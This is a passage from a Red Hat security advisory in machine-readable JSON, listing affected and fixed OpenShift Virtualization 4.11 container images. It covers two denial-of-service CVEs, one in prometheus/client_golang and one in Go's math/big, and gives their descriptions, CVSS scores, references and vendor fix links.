"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2045880"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service attack was found in prometheus/client_golang. This flaw allows an attacker to produce a denial of service attack on an HTTP server by exploiting the InstrumentHandlerCounter function in the version below 1.11.1, resulting in a loss of availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "prometheus/client_golang: Denial of service using InstrumentHandlerCounter",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw has been rated as having a moderate impact for two main reasons. The opportunity for a Denial of Service is limited to the golang runtime. In the case of OpenShift Container Platform, this would be restricted within each individual container. Additionally, this is in alignment with upstream\u0027s (the Prometheus project) impact rating.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64"
],
"known_not_affected": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-21698"
},
{
"category": "external",
"summary": "RHBZ#2045880",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2045880"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-21698",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21698"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-21698",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21698"
},
{
"category": "external",
"summary": "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p",
"url": "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p"
}
],
"release_date": "2022-02-15T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-09-14T19:28:51+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:6526"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "prometheus/client_golang: Denial of service using InstrumentHandlerCounter"
},
{
"cve": "CVE-2022-23772",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2022-02-11T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2053532"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the big package of the math library in golang. The Rat.SetString could cause an overflow, and if left unhandled, it could lead to excessive memory use. This issue could allow a remote attacker to impact the availability of the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Enterprise Linux 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope. \n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle \u0026 Updates Policy: https://access.redhat.com/support/policy/updates/errata/.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64"
],
"known_not_affected": [
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-23772"
},
{
"category": "external",
"summary": "RHBZ#2053532",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053532"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-23772",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23772"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-23772",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23772"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ",
"url": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ"
}
],
"release_date": "2022-01-19T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-09-14T19:28:51+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:6526"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
